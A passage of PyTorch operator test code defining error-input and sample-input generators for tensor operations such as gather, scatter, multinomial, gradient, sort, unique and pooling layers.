args=(1, idx)), error_regex="Index tensor must have the same number of dimensions") # src too few dimensions src = torch.tensor((1, 2), device=device, dtype=torch.float32) idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long) yield ErrorInput(SampleInput(src, args=(0, idx)), error_regex="Index tensor must have the same number of dimensions") # index out of bounds # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices if torch.device(device).type == 'cpu': src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32) idx = torch.tensor(((0, 23), (1, 0)), device=device, dtype=torch.long) yield ErrorInput(SampleInput(src, args=(1, idx,)), error_regex="index 23 is out of bounds for dimension") x = torch.rand((1,), device=device).expand((3,)) src = torch.rand((6,), device=device) ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64) yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=src)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(ind.clone(), args=(0, ind[1:],), kwargs=dict(out=ind[:1])), error_type=RuntimeError, error_regex='unsupported operation') def error_inputs_take(op_info, device, **kwargs): x = torch.rand((1,), device=device).expand((3,)) src = torch.rand((6,), device=device) ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64) yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=src)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(ind.clone(), args=(ind[1:],), kwargs=dict(out=ind[:-1])), error_type=RuntimeError, error_regex='unsupported operation') # Error inputs for scatter def error_inputs_scatter_and_scatter_add(op_info, device, **kwargs): # Error when self.dtype != src.dtype (and src is not a scalar) src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5), device=device, dtype=torch.double) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Expected self.dtype to be equal to src.dtype") # Index dtype must be long src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.int32) dst = torch.zeros((3, 5), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Expected dtype int64 for index") # Index and destination must have the same number of dimensions src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5, 3), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Index tensor must have the same number of dimensions as self tensor") # Index and src must have the same number of dimensions when src is not a scalar src = make_tensor((2, 5, 2), device=device, dtype=torch.float32) idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="Index tensor must have the same number of dimensions as src tensor") # Index out of bounds # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices if torch.device(device).type == 'cpu': src = make_tensor((2, 5), device=device, dtype=torch.float32) idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long) dst = torch.zeros((3, 5), device=device, dtype=torch.float32) yield ErrorInput(SampleInput(dst, args=(0, idx, src)), error_regex="index 34 is out of bounds for dimension 0 with size 3") def error_inputs_renorm(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(0.5, 0, 1.0)), error_type=RuntimeError, error_regex="needs at least 2 dimensions, got 0 dimensions") def error_inputs_lstsq(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError, error_regex="iteration over a 0-d tensor") def error_inputs_eig(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(False,)), error_type=RuntimeError, error_regex="input should be 2 dimensional") yield ErrorInput(SampleInput(zero_d, args=(True,)), error_type=RuntimeError, error_regex="input should be 2 dimensional") def error_inputs_ormqr(op_info, device, **kwargs): # this is only implemented on cpu if (torch.device(device).type == 'cpu'): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(zero_d, zero_d)), error_type=RuntimeError, error_regex="input must have at least 2 dimensions") def error_inputs_diag(op_info, device, **kwargs): zero_d = torch.randn((), device=device) yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError, error_regex="iteration over a 0-d tensor") def error_inputs_embedding(op_info, device, **kwargs): indices = torch.rand(2, 2, device=device).long() weights = [ torch.tensor(1.0, device=device), torch.tensor(1.0, device=device).reshape(1, 1, 1), ] for weight in weights: yield ErrorInput(SampleInput(weight, args=(indices,)), error_type=RuntimeError, error_regex="'weight' must be 2-D") def error_inputs_t(op_info, device, **kwargs): yield ErrorInput( SampleInput(torch.randn(2, 3, 4, 5, device=device)), error_type=RuntimeError, error_regex="expects a tensor with <= 2", ) def error_inputs_multinomial(op_info, device, **kwargs): x = torch.empty(1, 2, 3, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError, error_regex="prob_dist must be 1 or 2 dim") x = torch.empty(1, 2, dtype=torch.long, device=device) yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError, error_regex="multinomial only supports floating-point dtypes for input") x = torch.empty(1, 2, dtype=torch.double, device=device) y = torch.empty(1, 2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(2,), kwargs=dict(out=y)), error_type=RuntimeError, error_regex="multinomial expects Long tensor out") x = torch.empty(2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(0,)), error_type=RuntimeError, error_regex="cannot sample n_sample <= 0 samples") x = torch.empty(2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(-1,)), error_type=RuntimeError, error_regex="cannot sample n_sample <= 0 samples") x = torch.empty(2, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(3, False,)), error_type=RuntimeError, error_regex="cannot sample n_sample > prob_dist") x = torch.empty(16777217, dtype=torch.double, device=device) yield ErrorInput(SampleInput(x, args=(3,)), error_type=RuntimeError, error_regex="number of categories cannot exceed") def error_inputs_gradient(op_info, device, **kwargs): for dtype in [torch.long, torch.float32, torch.complex64]: t = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]], device=device, dtype=dtype) dim = (1, 0) spacing = [0.1] yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)), error_type=RuntimeError, error_regex='torch.gradient expected spacing to be unspecified, a scalar ') yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=3)), error_type=RuntimeError, error_regex='torch.gradient only supports edge_order=1 and edge_order=2.') dim = (1, 1) spacing = 0.1 yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)), error_type=RuntimeError, error_regex='dim 1 appears multiple times in the list of dims') dim = (0, 1) coordinates = [torch.tensor([1, 2, 4], device='cpu'), torch.tensor([1, 2, 4], device='meta')] yield ErrorInput(SampleInput(t, kwargs=dict(spacing=coordinates, dim=dim, edge_order=1)), error_type=RuntimeError, error_regex='torch.gradient expected each tensor to be on the same device,') yield ErrorInput(SampleInput(t, kwargs=dict(dim=3)), error_type=IndexError, error_regex='') t = torch.tensor([[1], [2], [3]]) yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=1)), error_type=RuntimeError, error_regex='torch.gradient expected each dimension size to be at least') t = torch.tensor([[1, 2], [3, 4]]) yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=2)), error_type=RuntimeError, error_regex='torch.gradient expected each dimension size to be at least') def error_inputs_masked_select(op_info, device, **kwargs): x = torch.rand((1,), device=device).expand((3,)) y = torch.rand((6,), device=device) mask = torch.tensor([True, False, True, True, False, False], device=device) yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=y)), error_type=RuntimeError, error_regex='unsupported operation') yield ErrorInput(SampleInput(mask.clone(), args=(mask,), kwargs=dict(out=mask)), error_type=RuntimeError, error_regex='unsupported operation') def error_inputs_index_select(op_info, device, **kwargs): x = torch.rand((1, 6), device=device).expand((2, 6)) y = torch.rand((3, 6), device=device) ind = torch.tensor([0, 1], dtype=torch.int64, device=device) yield ErrorInput(SampleInput(y, args=(1, ind,), kwargs=dict(out=x)), error_type=RuntimeError, error_regex='unsupported operation') def error_inputs_logcumsumexp(op_info, device, **kwargs): dim = 3 srcs = [torch.randn(5, 2, device=device), torch.randn(0, 2, device=device)] for src in srcs: yield ErrorInput(SampleInput(src, args=(dim,)), error_type=IndexError, error_regex='Dimension out of range') def sample_inputs_take_along_dim(op_info, device, dtype, requires_grad, **kwargs): return (SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S), 1, S, True, device=device), 0)), # `indices` broadcast SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((1, S // 2), 0, S, True, device=device), 1)), # `self` broadcast SampleInput(make_tensor((1, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S // 2), 0, S, True, device=device), 1)), # without `dim` arg SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S // 2), 0, S, True, device=device), )), SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(gather_variable((S, S // 2), 0, S, True, device=device),)), ) def error_inputs_aminmax_amax_amin(op_info, device, **kwargs): # Error Inputs for zero-dim tensors, when 'dim' arg is not provided. shape = (S, 0, S) err_msg_amax_amin = "reduction" err_msg_aminmax = "cannot compute aminmax over an empty dimension as the operation has no identity" if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']: yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_amax_amin) elif op_info.name in ['aminmax']: yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_aminmax) # Error Inputs for tensors with more than 64 dimension sizes = [1] * 65 err_msg1 = "only tensors with up to 64 dims are supported" yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': -1}), error_regex=err_msg1) yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': 64}), error_regex=err_msg1) # Error Inputs for repeated 'dim' if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']: dims = [(0, 0), (0, -4)] err_msg2 = "in the list of dims" x = torch.randn(S, S, S, S, device=device) for dim in dims: yield ErrorInput(SampleInput(x, kwargs={'dim': dim}), error_regex=err_msg2) # Error Input for illegal dtype input5 = torch.randn(L, L, dtype=torch.float32, device=device) max_values = torch.empty(L, dtype=torch.float32, device=device) min_values = torch.empty(L, dtype=torch.double, device=device) illegal_values = torch.empty(L, dtype=torch.int, device=device) err_msg_amax_amin2 = "Expected the dtype for input and out to match" err_msg_aminmax2 = "Expected out tensor to have dtype float, but got double instead" if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']: yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': illegal_values}), error_regex=err_msg_amax_amin2) elif op_info.name in ['aminmax']: yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': (max_values, min_values)}), error_regex=err_msg_aminmax2) # Error Inputs for functions to raise an error on specified zero'd dimension as reduction dim err_msg3 = "reduction" # FIXME: eager and ref impl throw different types of errors error_type = IndexError if 'refs' not in op_info.name else RuntimeError yield ErrorInput(SampleInput(torch.rand(shape, device=device), kwargs={'dim': 1}), error_type=error_type, error_regex=err_msg3) def sample_inputs_aminmax(op_info, device, dtype, requires_grad, **kwargs): test_cases: Tuple[tuple, dict] = ( # type: ignore[assignment] ((S, S, S), {}), ((S, S, S), {'dim': 1}), ((S, S, S), {'dim': 1, 'keepdim': True}), ((), {'dim': 0}), ((), {}), ((), {'dim': 0, 'keepdim': True}), ) samples: List[SampleInput] = [] for shape, kwargs in test_cases: samples.append(SampleInput( make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), kwargs=kwargs)) return samples def sample_inputs_diff(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases = ( ((1,), 0, None, None), ((S,), 0, None, None), ((S, 1), 0, None, None), ((S, 1), 1, None, None), ((S, S), 0, None, None), ((S, S), 1, None, None), ((S, S), 0, (1, S), (2, S)), ((S, S), 0, None, (2, S)), ((S, S, S), 1, None, None), ((S, S, S), 2, None, None), ((S, S, S), 1, (S, 1, S), (S, 1, S)), ((S, S, S), 2, (S, S, 1), (S, S, 1)), ((S, S, S), 2, (S, S, S), (S, S, S)),) sample_inputs = [] for size, dim, size_prepend, size_append in test_cases: prepend_size = 0 if (size_prepend is None) else size_prepend[dim] append_size = 0 if (size_append is None) else size_append[dim] dim_size = size[dim] + prepend_size + append_size for n in range(dim_size): input_tensor = make_arg(size) prepend = make_arg(size_prepend) if size_prepend else None append = make_arg(size_append) if size_append else None sample_inputs.append(SampleInput(input_tensor, args=(n, dim, prepend, append,))) # add some samples with n > dim_size sample_inputs.append(SampleInput(make_arg((S, S, S)), args=(S + 1, 1,))) sample_inputs.append(SampleInput(make_arg((S, S, S)), args=(S * 3 + 2, 2, make_arg((S, S, S)), make_arg((S, S, S)),))) return sample_inputs def sample_inputs_histogram(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for size, bin_ct, weighted, density in product(sizes, range(1, 5), [False, True], [False, True]): input_tensor = make_arg(size) weight_tensor = make_arg(size) if weighted else None sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,), kwargs=dict(weight=weight_tensor, density=density))) bins_tensor = make_arg((bin_ct + 1,)) sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,), kwargs=dict(weight=weight_tensor, density=density))) return sample_inputs def sample_inputs_histogramdd(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((S, S), (S, S, S), (S, 1, S), (S, 0, S)) bin_ct_patterns = ((1, 1, 1, 1, 1), (2, 3, 2, 3, 2), (3, 2, 3, 2, 3)) sample_inputs = [] for size, bin_ct_pattern, weighted, density in product(sizes, bin_ct_patterns, [False, True], [False, True]): input_tensor = make_arg(size) bin_ct = bin_ct_pattern[:size[-1]] weight_tensor = make_arg(size[:-1]) if weighted else None sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,), kwargs=dict(weight=weight_tensor, density=density))) bins_tensor = [make_arg(ct + 1) for ct in bin_ct] sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,), kwargs=dict(weight=weight_tensor, density=density))) return sample_inputs def sample_inputs_histc(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for size, min, max in product(sizes, [0, -10], [0, 10]): # construct sample input omitting bins arg sample_inputs.append(SampleInput(make_arg(size), kwargs=dict(min=min, max=max))) # construct sample inputs with a few different bins values for bins in [1, 3, 10]: sample_inputs.append(SampleInput(make_arg(size), kwargs=dict(bins=bins, min=min, max=max))) return sample_inputs def sample_inputs_bincount(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sample_inputs = [] for size, weighted in product((S, M), [False, True]): input_tensor = torch.randint(0, size, (size,), dtype=dtype, device=device) weight_tensor = make_arg((size,)) if weighted else None max_val = int(input_tensor.max().item()) for minlength in [0, max_val // 2, max_val, 2 * max_val]: sample_inputs.append(SampleInput(input_tensor, kwargs=dict(weights=weight_tensor, minlength=minlength))) return sample_inputs def sample_inputs_bucketize(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for size, out_int32, right in product(sizes, [False, True], [False, True]): input_tensor = make_arg(size) boundaries = make_arg((S,)).msort() sample_inputs.append(SampleInput(input_tensor, args=(boundaries, ), kwargs=dict(out_int32=out_int32, right=right))) return sample_inputs def sample_inputs_searchsorted(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((0,), (M,), (0, 0), (M, M), (0, 0, 0), (M, M, M)) inputs = [] for size, noncontiguous, out_int32, right in product(sizes, [False, True], [False, True], [False, True]): unsorted_tensor = make_arg(size, noncontiguous=noncontiguous) input_tensor = make_arg(size, noncontiguous=noncontiguous) if np.product(size) == 0: boundary_tensor = unsorted_tensor sorter = make_tensor(size, dtype=torch.int64, device=device, noncontiguous=noncontiguous) else: boundary_tensor, sorter = torch.sort(unsorted_tensor) side = "right" if right else "left" inputs.append(SampleInput(boundary_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, right=right))) inputs.append(SampleInput(boundary_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, side=side))) inputs.append( SampleInput(unsorted_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, right=right, sorter=sorter))) inputs.append( SampleInput(unsorted_tensor, args=(input_tensor,), kwargs=dict(out_int32=out_int32, side=side, sorter=sorter))) return inputs def sample_inputs_gradient(op_info, device, dtype, requires_grad, **kwargs): sample_inputs = [] test_cases_float = ( ((S,), None, None, 1), ((S,), 2., None, 1), ((S, S), None, None, 2), ((S, S), [2.0, 2.1], None, 1), ((S, S), [2.0, 2.1], (0, 1), 1), ((4, 4, 4), [2., 1.], (0, 1), 2), ) for size, spacing, dim, edge_order in test_cases_float: t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=spacing, edge_order=edge_order))) test_cases_tensor = ( ((3, 3, 3), ((1.1, 2.0, 3.5), (4.0, 2, 6.0)), (0, -1), 1), ((3, 3, 3), ((1.0, 3.0, 2.0), (8.0, 6.0, 1.0)), (0, 1), 2), ) for size, coordinates, dim, edge_order in test_cases_tensor: t = make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) coordinates_tensor_list = [] for coords in coordinates: # `coords` will always contain floating point values and Python 3.10 does not support this # implicit conversion to an integer using `__int__` # TODO: this can be simplified after https://github.com/pytorch/pytorch/issues/69316 is fixed a = torch.tensor(coords, device=device) coordinates_tensor_list.append(a.to(dtype)) sample_inputs.append(SampleInput(t, kwargs=dict(dim=dim, spacing=coordinates_tensor_list, edge_order=edge_order))) return tuple(sample_inputs) def sample_inputs_getitem(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_args = [ ([1, 2],), (slice(0, 3),), ([slice(0, 3), 1],), ([[0, 2, 3], [1, 3, 3], [0, 0, 2]],), ([[0, 0, 3], [1, 1, 3], [0, 0, 2]],), ([slice(None), slice(None), [0, 3]],), ([slice(None), [0, 3], slice(None)],), ([[0, 3], slice(None), slice(None)],), ([[0, 3], [1, 2], slice(None)],), ([[0, 3], ],), ([[0, 3], slice(None)],), ([[0, 3], Ellipsis],), ([[0, 2, 3], [1, 3, 3], torch.LongTensor([0, 0, 2])],), (index_variable(2, S, device=device),), (mask_not_all_zeros((S,)),), ] for args in test_args: yield SampleInput(make_arg((S, S, S)), args=args) yield SampleInput(make_arg((S, S, S, S)), args=([slice(None), [0, 1], slice(None), [0, 1]],)) def sample_inputs_index_put(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] for accumulate in [False, True]: # Test with indices arg inputs.append(SampleInput( make_arg((S, S,)), args=((index_variable(2, S, device=device),), make_arg((2, S))), kwargs=dict(accumulate=accumulate))) # Test with mask arg mask = torch.zeros(S, dtype=torch.bool) if accumulate else mask_not_all_zeros((S,)) inputs.append(SampleInput( make_arg((S, S)), args=((mask, ), make_arg((S,))), kwargs=dict(accumulate=accumulate))) return inputs def sample_inputs_sort(op_info, device, dtype, requires_grad, **kwargs): def small_3d_unique(): res = torch.randperm(S * S * S, dtype=torch.int64, device=device).view(S, S, S) res = res.to(dtype).requires_grad_(requires_grad) return res def large_1d_unique(): res = torch.randperm(L * L * L, dtype=torch.int64, device=device) res = res.to(dtype).requires_grad_(requires_grad) return res samples = [] # Test case for large tensor. samples.append(SampleInput(large_1d_unique())) # Test cases for small 3d tensors. # Imitates legacy tests from test/test_torch.py dims = range(-3, 3) flag = [True, False] for dim, descending, stable in product(dims, flag, flag): # default schema without stable sort samples.append(SampleInput(small_3d_unique(), args=(dim, descending))) # schema with stable sort, no CUDA support yet if torch.device(device).type == 'cpu': samples.append( SampleInput(small_3d_unique(), kwargs=dict(dim=dim, descending=descending, stable=stable)) ) # Test cases for scalar tensor samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad))) samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad), args=(0,))) samples.append(SampleInput(torch.tensor(1, dtype=dtype, device=device, requires_grad=requires_grad), args=(0, True))) # Test cases for stable sort samples.append(SampleInput(small_3d_unique(), kwargs=dict(stable=True))) samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, stable=True))) samples.append(SampleInput(small_3d_unique(), kwargs=dict(dim=0, descending=True, stable=True))) return samples def sample_inputs_threshold(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) sizes = ((), (S,), (S, S), (S, S, S)) samples = [] for x_size in sizes: # threshold and values args must be numbers samples.append(SampleInput(make_arg(x_size), args=(make_arg(()).item(), make_arg(()).item()))) return samples def sample_inputs_argsort(*args, **kwargs): return [sample_input for sample_input in sample_inputs_sort(*args, **kwargs) if "stable" not in sample_input.kwargs] def sample_inputs_unique(op_info, device, dtype, requires_grad, **kwargs): sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S)) sample_inputs = [] for shape, sorted, return_inverse, return_counts, dim in \ product(sizes, [False, True], [False, True], [False, True], [None, -2, -1, 0, 1, 2]): # torch.unique cannot be called if the input tensor has a zero dimension which isn't the selected dim if 0 in shape and shape.index(0) is not dim: continue # skip invalid dim args if dim is not None and (dim < -len(shape) or dim >= len(shape)): continue kwargs = dict(sorted=sorted, return_inverse=return_inverse, return_counts=return_counts, dim=dim) # construct a test case with only one distinct value input_t = torch.zeros(shape, dtype=dtype, device=device, requires_grad=requires_grad) sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy())) # construct a test case with mixed 0s and 1s input_t = make_tensor(shape, dtype=torch.bool, device=device, requires_grad=False)\ .to(dtype).requires_grad_(requires_grad) sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy())) # construct a test case with many different values input_t = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) sample_inputs.append(SampleInput(input_t, kwargs=kwargs.copy())) return sample_inputs def sample_inputs_unique_consecutive(*args, **kwargs): for sample_input in sample_inputs_unique(*args, **kwargs): if not sample_input.kwargs["sorted"]: sample_input.kwargs.pop("sorted") yield sample_input def sample_inputs_adaptive_avg_pool1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( ((0, 8, 8), (5,)), ((3, 8, 8), 5), ((3, 8, 8), 1) ) for input_shape, output_size in cases: # Batched yield SampleInput(make_arg(input_shape), args=(output_size,)) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=(output_size,)) def sample_inputs_adaptive_avg_pool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( ((1, 8, 8, 8), (5, 7)), ((2, 8, 8, 8), (None, 7)), ((1, 8, 4, 3), (5, None)), ((1, 8, 4, 3), (None, None)), ((1, 8, 4, 3), (5)), ) for input_shape, output_size in cases: # Batched yield SampleInput(make_arg(input_shape), args=(output_size,)) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=(output_size,)) def sample_inputs_adaptive_avg_pool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( ((0, 8, 8, 8, 8), (5, 7, 4)), ((1, 8, 4, 3, 7), (None, None, None)), ((1, 8, 4, 3, 7), (1, 1, 1)), ((3, 3, 8, 8, 6), (5, 7, None)), ((1, 3, 8, 8, 6), (5, None, 2)), ((3, 3, 8, 8, 6), (None, 3, 2)), ) for input_shape, output_size in cases: # Batched yield SampleInput(make_arg(input_shape), args=(output_size,)) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=(output_size,)) def sample_inputs_adaptive_max_pool1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( # ((0, 8, 8), (5,)), # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1] ((3, 4, 4), 3), ((3, 4, 4), 1) ) for shapes, return_idx in product(cases, (True, False)): # Batched yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx)) # Unbatched yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx)) def sample_inputs_adaptive_max_pool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( # ((0, 8, 8, 8), (5, 7)), # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1] ((1, 4, 4, 4), (2, 3)), ((2, 4, 4, 4), (None, 3)), ((2, 4, 4, 4), (1, 1)), ((1, 4, 4, 3), (3, None)), ((1, 4, 4, 3), (None, None)), ((1, 4, 4, 3), (3)), ) for shapes, return_idx in product(cases, (True, False)): # Batched yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx)) # Unbatched yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx)) def sample_inputs_adaptive_max_pool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as (input shape, output size) cases = ( # ((0, 8, 8, 8, 8), (5, 7, 4)), # 0 batch size doesn't work, cannot reshape tensor of 0 elements into shape [0, 8, -1] ((1, 4, 4, 3, 5), (None, None, None)), ((1, 4, 4, 3, 5), (1, 1, 1)), ((3, 3, 4, 4, 6), (2, 3, None)), ((1, 3, 4, 4, 6), (3, None, 2)), ((3, 3, 4, 4, 6), (None, 3, 2)), ) for shapes, return_idx in product(cases, (True, False)): # Batched yield SampleInput(make_arg(shapes[0]), args=(shapes[1], return_idx)) # Unbatched yield SampleInput(make_arg(shapes[0][1:]), args=(shapes[1], return_idx)) class _TestParamsMaxPoolBase(object): def __init__(self): self.kwargs = { 'kernel_size': [3], 'stride': [2, None], 'ceil_mode': [True, False], 'padding': [0, 1], 'dilation': [1], 'return_indices': [True, False] } self.shapes = [ [1, 2, None], # batch [2], # channels [3, 6] # signal ] def _gen_shape(self): for shape in product(*self.shapes): # shape[0] is None indicates missing batch dimension if shape[0] is None: shape = shape[1:] yield shape, torch.contiguous_format # only 2d (N, C, H, W) rank 4 tensors support channels_last memory format if len(self.shapes) == 4 and len(shape) == 4: yield shape, torch.channels_last def _gen_kwargs(self): keys = self.kwargs.keys() for values in product(*self.kwargs.values()): yield dict(zip(keys, values)) def gen_input_params(self): yield from product(self._gen_shape(), self._gen_kwargs()) class _TestParamsMaxPool1d(_TestParamsMaxPoolBase): def __init__(self): super().__init__() self.kwargs['kernel_size'] += [(3,)] self.kwargs['stride'] += [(2,)] self.kwargs['padding'] += [(1,)] self.kwargs['dilation'] += [(1,)] class _TestParamsMaxPool2d(_TestParamsMaxPoolBase): def __init__(self): super().__init__() self.kwargs['kernel_size'] += [(3, 2)] self.kwargs['stride'] += [(2, 1)] self.kwargs['padding'] += [(1, 1)] self.kwargs['dilation'] += [(1, 2)] self.shapes.append([6]) class _TestParamsMaxPool3d(_TestParamsMaxPoolBase): def __init__(self): super().__init__() self.kwargs['kernel_size'] += [(3, 2, 3)] self.kwargs['stride'] += [(2, 1, 2)] self.kwargs['dilation'] += [(1, 2, 1)] self.shapes.append([6]) self.shapes.append([5]) def sample_inputs_max_pool(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) params_generator_type_dict = { 'nn.functional.max_pool1d': _TestParamsMaxPool1d, 'nn.functional.max_pool2d': _TestParamsMaxPool2d, 'nn.functional.max_pool3d': _TestParamsMaxPool3d, } params_generator = params_generator_type_dict[op_info.name]() for (shape, memory_format), kwargs in params_generator.gen_input_params(): arg = make_arg(shape).to(memory_format=memory_format).requires_grad_(requires_grad) yield SampleInput(arg, kwargs=kwargs) def sample_inputs_normalize(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, low=-1, high=1, device=device, dtype=dtype, 